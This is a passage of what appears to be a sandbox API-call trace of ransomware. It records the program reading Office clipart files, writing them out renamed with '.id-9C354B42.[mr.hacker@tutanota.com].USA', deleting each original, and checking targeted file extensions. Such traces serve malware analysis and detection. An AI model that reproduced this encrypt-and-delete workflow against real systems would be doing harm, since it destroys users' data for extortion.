office\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.876] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.876] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.877] GetLastError () returned 0x0 [0271.877] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x670, lpOverlapped=0x0) returned 1 [0271.878] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x680, lpOverlapped=0x0) returned 1 [0271.879] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.879] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.879] SetEndOfFile (hFile=0x3a8) returned 1 [0271.879] CloseHandle (hObject=0x3a8) returned 1 [0271.879] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.879] SetEndOfFile (hFile=0x380) returned 1 [0271.881] CloseHandle (hObject=0x380) returned 1 [0271.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.882] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02158_.wmf")) returned 1 [0271.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.882] lstrlenW (lpString=".doc") returned 4 [0271.882] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.882] lstrlenW (lpString=".docx") returned 5 [0271.882] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.882] lstrlenW (lpString=".pdf") returned 4 [0271.882] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.882] lstrlenW (lpString=".xls") returned 4 [0271.882] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.882] lstrlenW (lpString=".xlsx") returned 5 [0271.882] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.882] lstrlenW (lpString=".ppt") returned 4 [0271.882] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.882] lstrlenW (lpString=".zip") returned 4 [0271.882] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.882] lstrlenW (lpString=".rar") returned 4 [0271.882] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.882] lstrlenW (lpString=".bz2") returned 4 [0271.882] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.882] lstrlenW (lpString=".7z") returned 3 [0271.883] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString=".dbf") returned 4 [0271.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString=".1cd") returned 4 [0271.883] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString=".jpg") returned 4 [0271.883] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString=".doc") returned 4 [0271.883] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString=".docx") returned 5 [0271.883] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.883] lstrlenW (lpString=".pdf") returned 4 [0271.883] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString=".xls") returned 4 [0271.883] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.883] lstrlenW (lpString=".xlsx") returned 5 [0271.883] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.883] lstrlenW (lpString=".ppt") returned 4 [0271.883] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.883] lstrlenW (lpString=".zip") returned 4 [0271.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.883] lstrlenW (lpString=".rar") returned 4 [0271.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString=".bz2") returned 4 [0271.883] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.883] lstrlenW (lpString=".7z") returned 3 [0271.884] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.884] lstrlenW (lpString=".dbf") returned 4 [0271.884] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.884] lstrlenW (lpString=".1cd") returned 4 [0271.884] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 63 [0271.884] lstrlenW (lpString=".jpg") returned 4 [0271.884] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.884] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.884] lstrlenW (lpString="FD02161_.WMF") returned 12 [0271.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.884] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3128) returned 1 [0271.884] CloseHandle (hObject=0x380) returned 1 [0271.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf")) returned 0x20 [0271.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.885] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.885] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.885] GetLastError () returned 0x0 [0271.885] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xc38, lpOverlapped=0x0) returned 1 [0271.887] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xc40, lpOverlapped=0x0) returned 1 [0271.887] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.888] WriteFile (in: hFile=0x3a8, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.888] SetEndOfFile (hFile=0x3a8) returned 1 [0271.888] CloseHandle (hObject=0x3a8) returned 1 [0271.888] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.888] SetEndOfFile (hFile=0x380) returned 1 [0271.889] CloseHandle (hObject=0x380) returned 1 [0271.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02161_.wmf")) returned 1 [0271.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.890] lstrlenW (lpString=".doc") returned 4 [0271.890] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.890] lstrlenW (lpString=".docx") returned 5 [0271.890] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.890] lstrlenW (lpString=".pdf") returned 4 [0271.890] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.890] lstrlenW (lpString=".xls") returned 4 [0271.890] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.890] lstrlenW (lpString=".xlsx") returned 5 [0271.890] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.890] lstrlenW (lpString=".ppt") returned 4 [0271.890] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.890] lstrlenW (lpString=".zip") returned 4 [0271.890] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.890] lstrlenW (lpString=".rar") returned 4 [0271.890] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.890] lstrlenW (lpString=".bz2") returned 4 [0271.891] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString=".7z") returned 3 [0271.891] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString=".dbf") returned 4 [0271.891] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString=".1cd") returned 4 [0271.891] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString=".jpg") returned 4 [0271.891] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString=".doc") returned 4 [0271.891] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString=".docx") returned 5 [0271.891] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.891] lstrlenW (lpString=".pdf") returned 4 [0271.891] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString=".xls") returned 4 [0271.891] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.891] lstrlenW (lpString=".xlsx") returned 5 [0271.891] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.891] lstrlenW (lpString=".ppt") returned 4 [0271.891] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.891] lstrlenW (lpString=".zip") returned 4 [0271.891] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.891] lstrlenW (lpString=".rar") returned 4 [0271.891] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.891] lstrlenW (lpString=".bz2") returned 4 [0271.892] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.892] lstrlenW (lpString=".7z") returned 3 [0271.892] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.892] lstrlenW (lpString=".dbf") returned 4 [0271.892] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.892] lstrlenW (lpString=".1cd") returned 4 [0271.892] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63 [0271.892] lstrlenW (lpString=".jpg") returned 4 [0271.892] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.892] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.892] lstrlenW (lpString="FLAP.WMF") returned 8 [0271.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.090] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2070) returned 1 [0272.090] CloseHandle (hObject=0x3b4) returned 1 [0272.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf")) returned 0x20 [0272.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.091] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.091] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.091] GetLastError () returned 0x0 [0272.091] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x816, lpOverlapped=0x0) returned 1 [0272.093] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x820, lpOverlapped=0x0) returned 1 [0272.093] ReadFile (in: hFile=0x3b4, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.093] WriteFile (in: hFile=0x2bc, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0272.094] SetEndOfFile (hFile=0x2bc) returned 1 [0272.094] CloseHandle (hObject=0x2bc) returned 1 [0272.094] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.094] SetEndOfFile (hFile=0x3b4) returned 1 [0272.097] CloseHandle (hObject=0x3b4) returned 1 [0272.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf")) returned 1 [0272.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString=".doc") returned 4 [0272.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString=".docx") returned 5 [0272.098] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.098] lstrlenW (lpString=".pdf") returned 4 [0272.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString=".xls") returned 4 [0272.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.098] lstrlenW (lpString=".xlsx") returned 5 [0272.098] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.098] lstrlenW (lpString=".ppt") returned 4 [0272.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString=".zip") returned 4 [0272.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.098] lstrlenW (lpString=".rar") returned 4 [0272.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString=".bz2") returned 4 [0272.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString=".7z") returned 3 [0272.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString=".dbf") returned 4 [0272.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString=".1cd") returned 4 [0272.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.098] lstrlenW (lpString=".jpg") returned 4 [0272.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString=".doc") returned 4 [0272.099] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString=".docx") returned 5 [0272.099] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0272.099] lstrlenW (lpString=".pdf") returned 4 [0272.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString=".xls") returned 4 [0272.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.099] lstrlenW (lpString=".xlsx") returned 5 [0272.099] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.099] lstrlenW (lpString=".ppt") returned 4 [0272.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString=".zip") returned 4 [0272.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.099] lstrlenW (lpString=".rar") returned 4 [0272.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString=".bz2") returned 4 [0272.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString=".7z") returned 3 [0272.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString=".dbf") returned 4 [0272.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString=".1cd") returned 4 [0272.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 59 [0272.099] lstrlenW (lpString=".jpg") returned 4 [0272.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.100] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.100] lstrlenW (lpString="HH00236_.WMF") returned 12 [0272.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.100] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3286) returned 1 [0272.100] CloseHandle (hObject=0x3b4) returned 1 [0272.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf")) returned 0x20 [0272.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.100] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.100] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 